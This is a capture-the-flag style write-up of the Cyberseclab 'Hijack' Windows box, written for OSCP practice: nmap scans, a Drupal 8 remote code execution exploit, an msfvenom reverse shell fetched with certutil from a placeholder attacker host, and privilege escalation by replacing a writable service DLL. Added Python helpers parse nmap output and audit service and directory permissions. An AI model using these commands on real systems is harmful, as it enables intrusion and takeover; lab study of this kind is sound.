Cyberseclab | Hijack — WriteUp

Mandoy
6 min read · Apr 9, 2021

In preparation for the OSCP certification, I have challenged myself to write at least 40 walkthroughs/writeups. This is the first of the 40. The vulnerable machine is Hijack from Cyberseclab.

My first step is information gathering, or reconnaissance. In this phase I collect all the information I can about the target computer, system or network.

RECONNAISSANCE

  1. Port Scan - scan all TCP ports (-p-) to find the open ones.

sudo nmap -p- -sS -Pn -n --min-rate=3000 172.31.1.27
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-09 04:35 EDT
Nmap scan report for 172.31.1.27
Host is up (0.26s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49672/tcp open unknown

2. Gather more detailed information with Nmap's default scripts (-sC), version detection (-sV) and OS detection (-O) against the open ports found in step 1.

sudo nmap -p80,135,139,445,3306,3389,5985,47001,49664,49665,49666,49667,49668,49669,49672 -sC -sV -O -Pn -n -T4 172.31.1.27

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-09 04:37 EDT
Nmap scan report for 172.31.1.27
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.37 ((Win32) OpenSSL/1.1.1a PHP/7.2.13)
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.37 (Win32) OpenSSL/1.1.1a PHP/7.2.13
|_http-title: Welcome to Hijack | Hijack
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HIJACK
| NetBIOS_Domain_Name: HIJACK
| NetBIOS_Computer_Name: HIJACK
| DNS_Domain_Name: Hijack
| DNS_Computer_Name: Hijack
| Product_Version: 10.0.17763
|_ System_Time: 2021-04-09T08:39:08+00:00
| ssl-cert: Subject: commonName=Hijack
| Not valid before: 2021-04-08T08:34:00
|_Not valid after: 2021-10-08T08:34:00
|_ssl-date: 2021-04-09T08:39:16+00:00; +3s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Vista SP1 (91%), Microsoft Windows 10 1709-1909 (91%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 10 1703 (89%), Microsoft Windows 8 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 10 1709-1803 (88%), Microsoft Windows 10 1809-1909 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 2s
|_nbstat: NetBIOS name: HIJACK, NetBIOS user: <unknown>, NetBIOS MAC: 02:96:61:2e:de:2a (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-09T08:39:07
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.97 seconds
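The step-2 port list above was typed by hand and dropped 443/tcp, which the full scan reported open. As an added example (not from the writeup), the following Python parses the step-1 port table, builds the step-2 command from it so no open port is dropped, and lists the open ports nmap could not name; its only input is the port table quoted from the scan above.

```python
import re

# The port table from the writeup's step-1 scan (output quoted from the page);
# the parser ignores every line that is not a "port/proto state service" row.
FULL_SCAN = """\
Not shown: 65519 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49672/tcp open unknown
"""
PORT_ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered|open\|filtered)\s+(\S+)")

def parse_ports(scan_text):
    """Yield (port, state, service) for each port row in nmap normal output."""
    for line in scan_text.splitlines():
        if m := PORT_ROW.match(line):
            yield int(m.group(1)), m.group(3), m.group(4)

def open_ports(scan_text):
    return sorted({p for p, state, _ in parse_ports(scan_text) if state == "open"})

def unnamed_ports(scan_text):
    """Open ports nmap had no service name for; these need -sV most."""
    return [p for p, state, svc in parse_ports(scan_text) if state == "open" and svc == "unknown"]

def targeted_scan_cmd(scan_text, target, extra="-sC -sV -O -Pn -n -T4"):
    """Build the step-2 command from step-1 output so no open port is dropped by hand."""
    ports = open_ports(scan_text)
    if not ports:
        raise ValueError("no open ports in scan output")
    return f"sudo nmap -p{','.join(map(str, ports))} {extra} {target}"
```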

3. Enumeration - enumerate each open port and look for a vulnerability that gives us a foothold.

🌎 Port 80 HTTP

a.) Visit the website.

b.) Use Wappalyzer to identify the technologies the site uses. Wappalyzer shows that the web application is Drupal 8.

c.) Search for exploits with searchsploit to list everything available for Drupal.

sudo searchsploit drupal

I tried several of the Drupal 8 RCE exploits; the one that worked for me was 44482.rb. Once the exploit runs you get a low-privilege shell.

Lower Privilege Shell

After exploiting the machine, the next step is to upgrade to a better shell.

4. Upgrade the shell

  • Create a reverse shell payload
msfvenom -p $payload -f $format LHOST=$attacker_ip LPORT=$attacker_port -o $outfile
  • Start a listener
nc -nvlp $lport
  • Host a simple HTTP server (Python 2; with Python 3 use python3 -m http.server 80)
python -m SimpleHTTPServer 80
  • Download the payload on the target
certutil -urlcache -f http://$attacker_ip/$file $output_name
  • Execute the file to get a reverse shell

New reverse shell

5. Privilege Escalation - the last step is to elevate our shell to the highest privilege level so we have full control of the system.

  • Download winPEAS 👇

privilege-escalation-awesome-scripts-suite/winPEAS at master · carlospolop/privilege-escalation-awesome-scripts-suite · GitHub

  • Run winPEAS and look through the results for anything interesting.

Going through the winPEAS results, I found an interesting service named Hijack.

  • Use accesschk to check our permissions on the service
.\accesschk.exe /accepteula -uvqc users $serviceName

As shown above, we can start and stop the service. Looking into the Hijack directory, there is a subdirectory named libraries.

In this directory there is a DLL file.

Use accesschk to check for write permission. As the image below shows, our user can read and write in this directory.

Create a DLL reverse shell payload with msfvenom.

Download the payload to the target, overwriting the old Custom.dll.

Start a listener

nc -nvlp 53

Start the service to get an admin shell

sc start $serviceName
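The two conditions the writeup chained, start/stop rights on the service and write access to the directory its DLL is loaded from, are exactly what a defender should audit for every third-party service on a host. As an added example (not from the writeup or from the accesschk tool), this Python reads accesschk -v style output and reports whether a principal holds both; the two ACL texts are constructed samples that model the Hijack findings, and the rights it treats as "can write into a directory" are an assumption listed in the code.

```python
import re
# Constructed samples in the style of accesschk -v output for a service and for a
# directory; not captures from the box, but they model the rights the writeup
# found (service start/stop for Users plus a Users-writable DLL directory).
SERVICE_ACL = """\
hijack
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\\Users
        SERVICE_QUERY_STATUS
        SERVICE_START
        SERVICE_STOP
"""
LIB_DIR_ACL = """\
C:\\Hijack\\libraries
  RW BUILTIN\\Users
        FILE_ALL_ACCESS
"""
PRINCIPAL = re.compile(r"^  (RW|R|W) (.+)$")  # e.g. "  RW BUILTIN\Users"
RIGHT = re.compile(r"^ {6,}([A-Z_]+)$")       # e.g. "        SERVICE_START"
# Assumed set of rights that let a principal create or replace files in a directory.
DIR_WRITE = {"FILE_ALL_ACCESS", "FILE_WRITE_DATA", "FILE_ADD_FILE",
             "FILE_GENERIC_WRITE", "GENERIC_WRITE"}
def parse_accesschk(text):
    """Map each principal in accesschk -v output to its set of named rights."""
    rights, current = {}, None
    for line in text.splitlines():
        if m := PRINCIPAL.match(line):
            current = m.group(2).strip()
            rights.setdefault(current, set())
        elif (m := RIGHT.match(line)) and current:
            rights[current].add(m.group(1))
    return rights

def can_restart(svc_rights):
    return "SERVICE_ALL_ACCESS" in svc_rights or {"SERVICE_START", "SERVICE_STOP"} <= svc_rights

def can_write_dir(dir_rights):
    return bool(dir_rights & DIR_WRITE)

def dll_hijack_risk(service_acl, dir_acl, principal="BUILTIN\\Users"):
    """(exploitable, findings): both findings together let `principal` swap the DLL and trigger its load."""
    svc = parse_accesschk(service_acl).get(principal, set())
    lib = parse_accesschk(dir_acl).get(principal, set())
    findings = []
    if can_write_dir(lib):
        findings.append(f"{principal} can write to the service's library directory")
    if can_restart(svc):
        findings.append(f"{principal} can stop and start the service")
    return can_write_dir(lib) and can_restart(svc), findings
```

Either finding alone is a misconfiguration worth fixing; removing the write right on the directory (or the start/stop right from the service ACL) breaks the chain.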
